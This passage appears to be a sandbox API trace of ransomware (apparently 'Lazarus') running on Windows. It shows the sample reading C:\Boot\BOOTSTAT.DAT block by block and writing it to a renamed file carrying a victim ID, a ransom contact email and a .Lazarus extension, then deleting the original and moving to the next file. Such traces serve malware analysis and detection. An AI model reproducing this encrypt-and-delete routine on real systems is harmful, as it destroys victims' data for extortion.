Size=0x10) returned 0x7d4c8 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0082.583] GetLastError () returned 0x0 [0082.583] SetLastError (dwErrCode=0x0) [0082.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0082.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0082.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0082.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0082.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a3b0 [0082.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0082.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.584] AreFileApisANSI () returned 1 [0082.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6a3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0082.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0082.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6a3b0, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=83 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 83 [0082.584] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\boot\\bootstat.dat.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.584] GetFileType (hFile=0x430) returned 0x1 [0082.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.585] AreFileApisANSI () returned 1 [0082.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4dfc0 [0082.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x4dfc0, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0082.585] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.585] GetFileType (hFile=0x334) returned 0x1 [0082.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.585] GetLastError () returned 0x0 [0082.585] SetLastError (dwErrCode=0x0) [0082.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.585] GetLastError () returned 0x0 [0082.585] SetLastError (dwErrCode=0x0) [0082.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0082.586] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0082.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0082.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0082.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x570e0 [0082.588] GetLastError () returned 0x0 [0082.588] SetLastError (dwErrCode=0x0) [0082.588] GetLastError () returned 0x0 [0082.588] SetLastError (dwErrCode=0x0) [0082.588] GetLastError () returned 0x0 [0082.588] SetLastError (dwErrCode=0x0) [0082.588] GetLastError () returned 0x0 [0082.588] SetLastError (dwErrCode=0x0) [0082.588] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.588] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.589] GetLastError () returned 0x0 [0082.589] SetLastError (dwErrCode=0x0) [0082.590] GetLastError () returned 0x0 [0082.590] SetLastError (dwErrCode=0x0) [0082.590] GetLastError () returned 0x0 [0082.590] SetLastError (dwErrCode=0x0) [0082.590] GetLastError () returned 0x0 [0082.590] SetLastError (dwErrCode=0x0) [0082.590] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.590] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.590] GetLastError () returned 0x0 [0082.590] SetLastError (dwErrCode=0x0) [0082.590] GetLastError () returned 0x0 [0082.590] SetLastError (dwErrCode=0x0) [0082.591] GetLastError () returned 0x0 [0082.591] SetLastError (dwErrCode=0x0) [0082.591] GetLastError () returned 0x0 [0082.591] SetLastError (dwErrCode=0x0) [0082.591] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.591] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.591] GetLastError () returned 0x0 [0082.591] SetLastError (dwErrCode=0x0) [0082.591] GetLastError () returned 0x0 [0082.591] SetLastError (dwErrCode=0x0) [0082.591] GetLastError () returned 0x0 [0082.591] SetLastError (dwErrCode=0x0) [0082.591] GetLastError () returned 0x0 [0082.592] SetLastError (dwErrCode=0x0) [0082.592] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.592] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.592] GetLastError () returned 0x0 [0082.592] SetLastError (dwErrCode=0x0) [0082.592] GetLastError () returned 0x0 [0082.592] SetLastError (dwErrCode=0x0) [0082.592] GetLastError () returned 0x0 [0082.592] SetLastError (dwErrCode=0x0) [0082.592] GetLastError () returned 0x0 [0082.592] SetLastError (dwErrCode=0x0) [0082.592] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.593] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.593] GetLastError () returned 0x0 [0082.593] SetLastError (dwErrCode=0x0) [0082.593] GetLastError () returned 0x0 [0082.593] SetLastError (dwErrCode=0x0) [0082.593] GetLastError () returned 0x0 [0082.593] SetLastError (dwErrCode=0x0) [0082.593] GetLastError () returned 0x0 [0082.593] SetLastError (dwErrCode=0x0) [0082.593] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.593] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.594] GetLastError () returned 0x0 [0082.594] SetLastError (dwErrCode=0x0) [0082.594] GetLastError () returned 0x0 [0082.594] SetLastError (dwErrCode=0x0) [0082.594] GetLastError () returned 0x0 [0082.594] SetLastError (dwErrCode=0x0) [0082.594] GetLastError () returned 0x0 [0082.594] SetLastError (dwErrCode=0x0) [0082.594] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.594] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.594] GetLastError () returned 0x0 [0082.595] SetLastError (dwErrCode=0x0) [0082.595] GetLastError () returned 0x0 [0082.595] SetLastError (dwErrCode=0x0) [0082.595] GetLastError () returned 0x0 [0082.595] SetLastError (dwErrCode=0x0) [0082.595] GetLastError () returned 0x0 [0082.595] SetLastError (dwErrCode=0x0) [0082.595] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.595] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.595] GetLastError () returned 0x0 [0082.595] SetLastError (dwErrCode=0x0) [0082.595] GetLastError () returned 0x0 [0082.596] SetLastError (dwErrCode=0x0) [0082.596] GetLastError () returned 0x0 [0082.596] SetLastError (dwErrCode=0x0) [0082.596] GetLastError () returned 0x0 [0082.596] SetLastError (dwErrCode=0x0) [0082.596] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.596] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.596] GetLastError () returned 0x0 [0082.596] SetLastError (dwErrCode=0x0) [0082.596] GetLastError () returned 0x0 [0082.596] SetLastError (dwErrCode=0x0) [0082.596] GetLastError () returned 0x0 [0082.597] SetLastError (dwErrCode=0x0) [0082.597] GetLastError () returned 0x0 [0082.597] SetLastError (dwErrCode=0x0) [0082.597] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.597] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.597] GetLastError () returned 0x0 [0082.597] SetLastError (dwErrCode=0x0) [0082.597] GetLastError () returned 0x0 [0082.597] SetLastError (dwErrCode=0x0) [0082.597] GetLastError () returned 0x0 [0082.597] SetLastError (dwErrCode=0x0) [0082.597] GetLastError () returned 0x0 [0082.597] SetLastError (dwErrCode=0x0) [0082.598] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.598] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.598] GetLastError () returned 0x0 [0082.598] SetLastError (dwErrCode=0x0) [0082.598] GetLastError () returned 0x0 [0082.598] SetLastError (dwErrCode=0x0) [0082.598] GetLastError () returned 0x0 [0082.598] SetLastError (dwErrCode=0x0) [0082.598] GetLastError () returned 0x0 [0082.598] SetLastError (dwErrCode=0x0) [0082.598] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.599] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.599] GetLastError () returned 0x0 [0082.599] SetLastError (dwErrCode=0x0) [0082.599] GetLastError () returned 0x0 [0082.599] SetLastError (dwErrCode=0x0) [0082.599] GetLastError () returned 0x0 [0082.599] SetLastError (dwErrCode=0x0) [0082.599] GetLastError () returned 0x0 [0082.599] SetLastError (dwErrCode=0x0) [0082.599] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.600] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.600] GetLastError () returned 0x0 [0082.600] SetLastError (dwErrCode=0x0) [0082.600] GetLastError () returned 0x0 [0082.600] SetLastError (dwErrCode=0x0) [0082.600] GetLastError () returned 0x0 [0082.600] SetLastError (dwErrCode=0x0) [0082.600] GetLastError () returned 0x0 [0082.600] SetLastError (dwErrCode=0x0) [0082.600] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.600] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.601] GetLastError () returned 0x0 [0082.601] SetLastError (dwErrCode=0x0) [0082.601] GetLastError () returned 0x0 [0082.601] SetLastError (dwErrCode=0x0) [0082.601] GetLastError () returned 0x0 [0082.601] SetLastError (dwErrCode=0x0) [0082.601] GetLastError () returned 0x0 [0082.601] SetLastError (dwErrCode=0x0) [0082.601] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.714] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.718] GetLastError () returned 0x0 [0082.718] SetLastError (dwErrCode=0x0) [0082.722] GetLastError () returned 0x0 [0082.722] SetLastError (dwErrCode=0x0) [0082.728] GetLastError () returned 0x0 [0082.729] SetLastError (dwErrCode=0x0) [0082.729] GetLastError () returned 0x0 [0082.735] SetLastError (dwErrCode=0x0) [0082.735] ReadFile (in: hFile=0x334, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0082.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0082.749] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0082.749] GetLastError () returned 0x0 [0082.749] SetLastError (dwErrCode=0x0) [0082.749] GetLastError () returned 0x0 [0082.749] SetLastError (dwErrCode=0x0) [0082.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0082.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0082.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0082.749] CloseHandle (hObject=0x430) returned 1 [0082.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0082.752] CloseHandle (hObject=0x334) returned 1 [0082.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0082.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.752] AreFileApisANSI () returned 1 [0082.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0082.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4e458 [0082.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x4e458, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0082.752] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.752] GetLastError () returned 0x5 [0082.752] GetLastError () returned 0x5 [0082.752] SetLastError (dwErrCode=0x5) [0082.752] GetLastError () returned 0x5 [0082.752] SetLastError (dwErrCode=0x5) [0082.752] GetLastError () returned 0x5 [0082.752] SetLastError (dwErrCode=0x5) [0082.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0082.753] GetLastError () returned 0x5 [0082.753] SetLastError (dwErrCode=0x5) [0082.753] AreFileApisANSI () returned 1 [0082.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0082.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4df18 [0082.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x4df18, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0082.753] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.755] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x1, dwReserved1=0x0, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 